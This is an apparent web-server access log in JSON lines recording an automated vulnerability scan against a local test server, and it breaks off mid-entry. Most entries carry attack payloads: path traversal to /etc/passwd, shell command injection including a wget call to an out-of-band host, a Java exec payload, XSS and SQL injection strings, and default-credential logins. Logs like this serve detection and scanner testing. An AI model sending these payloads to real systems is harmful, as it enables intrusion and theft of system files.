+{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22logfile\x22; filename=\x22\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://ca28q98smpvbk9ig07h0z858ppp3a7mnb.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/device-id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 